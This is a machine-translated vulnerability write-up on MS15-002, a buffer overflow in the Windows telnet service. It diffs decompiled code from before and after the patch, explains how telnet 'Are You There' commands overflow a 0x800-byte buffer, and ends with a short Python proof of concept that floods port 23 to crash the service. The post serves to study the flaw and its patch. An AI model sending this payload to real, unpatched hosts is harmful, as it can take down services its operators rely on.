MS15-002 telnet service buffer overflow vulnerability analysis and POC structure

[Nytro]

2015/01/16 9:09 | cssembly | binary security , vulnerability analysis | accounting for a seat first | donate author

0x00 principle vulnerability analysis

---

MS15-002 is Microsoft telnet service buffer overflow vulnerability, the following principles to analyze and construct its POC.

telnet service process for tlntsvr.exe, for each client connection will start executing a corresponding tlntsess.exe process is tlntsess.exe patched files through a patch over right, identify vulnerabilities position follows function

[TABLE]

[TR]

[TD=class: gutter]1[/TD]

[TD=class: code]signed int __thiscall CRFCProtocol::ProcessDataReceivedOnSocket(CRFCProtocol *this, unsigned __int32 *a2)

[/TD]

[/TR]

[/TABLE]

Patch before, this function are:

After the patch, the function is:

That turned a buffer into two, calling finish

[TABLE]

[TR]

[TD=class: gutter]1[/TD]

[TD=class: code](*(void (__thiscall **)(CRFCProtocol *, unsigned __int8 **, unsigned __int8 **, unsigned __int8))((char *)&off_1011008 + v12))(v2,&v13,&v9,v6)[/TD]

[/TR]

[/TABLE]

After the first data to judge the length of the buffer, if

[TABLE]

[TR]

[TD=class: gutter]1[/TD]

[TD=class: code](unsigned int)(v9 - (unsigned __int8 *)&Src - 1) <= 0x7FE [/TD]

[/TR]

[/TABLE]

It is determined that the target buffer can accommodate the number of characters, if

[TABLE]

[TR]

[TD=class: gutter]1[/TD]

[TD=class: code](unsigned int)((char *)v14 + v7 - (_DWORD)&Dst) >= 0x800[/TD]

[/TR]

[/TABLE]

Exit, else

[TABLE]

[TR]

[TD=class: gutter]1[/TD]

[TD=class: code]memcpy_s(v14, (char *)&v18 - (_BYTE *)v14, &Src, v9 - (unsigned __int8 *)&Src)[/TD]

[/TR]

[/TABLE]

Copy data to Dst buffer.

The front patch, only one buffer, call

[TABLE]

[TR]

[TD=class: gutter]1[/TD]

[TD=class: code](*(&off_1011008 + 3 * v7))(v3, &v14, &v13, *v6)[/TD]

[/TR]

[/TABLE]

Before the first data buffer length determination, v13 only when - & Src <= 2048 when calling, v13 point available buffer head, and

[TABLE]

[TR]

[TD=class: gutter]1[/TD]

[TD=class: code](*(&off_1011008 + 3 * v7))(v3, &v14, &v13, *v6)[/TD]

[/TR]

[/TABLE]

Function of the call, the value v13 will be modified, if the call

[TABLE]

[TR]

[TD=class: gutter]1[/TD]

[TD=class: code]void __thiscall CRFCProtocol::DoTxBinary(CRFCProtocol *this, unsigned __int8 **a2, unsigned __int8 **a3, unsigned __int8 a4)[/TD]

[/TR]

[/TABLE]

Function, you can see the function changes the value of the parameter 3, that * a3 + = 3.

After analysis can know if v13 - & Src = 2047, then meet v13 - & Src <= 2048 condition, then if (* (& off_1011008 + 3 * v7)) (v3, & v14, & v13, * v6) call is CRFCProtocol: : DoTxBinary function and perform the following sequence of instructions, apparently led to a buffer overflow.

[TABLE]

[TR]

[TD=class: gutter]1

2

3

4

5

6[/TD]

[TD=class: code]v7 = *a3;

*v7 = -1;

v7[1] = -3;

v7[2] = a4;

v7[3] = 0;

*a3 += 3;[/TD]

[/TR]

[/TABLE]

Patched version, using two buffers, the temporary buffer pointer passed to v9

[TABLE]

[TR]

[TD=class: gutter]1[/TD]

[TD=class: code](*(void (__thiscall **)(CRFCProtocol *, unsigned __int8 **, unsigned __int8 **, unsigned __int8))((char *)&off_1011008 + v12))(v2,&v13,&v9,v6)

[/TD]

[/TR]

[/TABLE]

After the function returns the data to determine the length of the buffer pointed v9, and finally determine whether the destination buffer space available to accommodate the remaining data in the buffer pointed v9, namely (unsigned int) ((char *) v14 + v7 - ( _DWORD) & Dst)> = 0x800 judgment.

0x01 environment to build and construct POC

---

Win7 install and start the telnet server, perform net user exp 123456 / ADD increase user exp, via net localgroup TelnetClients exp / ADD TelnetClients add the user to the group, so that you can log in through a telnet client.

Debugging found

[TABLE]

[TR]

[TD=class: gutter]1[/TD]

[TD=class: code]signed int __thiscall CRFCProtocol::ProcessDataReceivedOnSocket(CRFCProtocol *this, unsigned __int32 *a2)[/TD]

[/TR]

[/TABLE]

In a2 for the received data length, up to 0x400, v6 point the received data, apparently in order to trigger the overflow must be called ((& off_1011008 + 3 * v7)) (v3, & v14, & v13, * v6), the let the data arising from expansion, to ensure data processing after the Src buffer length is greater than 0x800.

View (* (& off_1011008 + 3 * v7)) (v3, & v14, & v13, * v6) of the function can be called,

[TABLE]

[TR]

[TD=class: gutter]1[/TD]

[TD=class: code]void __thiscall CRFCProtocol::AreYouThere(CRFCProtocol *this, unsigned __int8 **a2, unsigned __int8 **a3, unsigned __int8 a4)[/TD]

[/TR]

[/TABLE]

Will obviously result in data expansion, a4 is the received data in a byte, after execution, a3 will be written into the buffer pointed to 9 bytes of fixed data.

By wireshark cut package, simply for protocol analysis, construction POC follows, let the program repeatedly CRFCProtocol :: AreYouThere function and eventually trigger an exception.

[TABLE]

[TR]

[TD=class: gutter]1

2

3

4

5

6

7

8[/TD]

[TD=class: code]import socket

address = ('192.168.172.152', 23)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect(address)

data = "\xff\xf6" * 0x200

s.send(data)

s.recv(512)

s.close()[/TD]

[/TR]

[/TABLE]

Run poc, in

[TABLE]

[TR]

[TD=class: gutter]1[/TD]

[TD=class: code]signed int __thiscall CRFCProtocol::ProcessDataReceivedOnSocket( CRFCProtocol *this, unsigned __int32 *a2)[/TD]

[/TR]

[/TABLE]

Set a breakpoint, you can see after the break a2 = 0x400, (DWORD) ((DWORD *) (this + 0x1E40) + 0x16c8) point to get the data received.

Set a breakpoint before the function returns, after the execution, you can see __security_check_cookie detected a stack overflow, triggering an exception, break into the debugger.

Disclaimer: Prohibit unauthorized reproduced cssembly @ clouds Knowledge

SursaL https://translate.google.com/translate?sl=auto&tl=en&js=y&prev=_t&hl=en&ie=UTF-8&u=http%3A%2F%2Fdrops.wooyun.org%2Fpapers%2F4621&edit-text=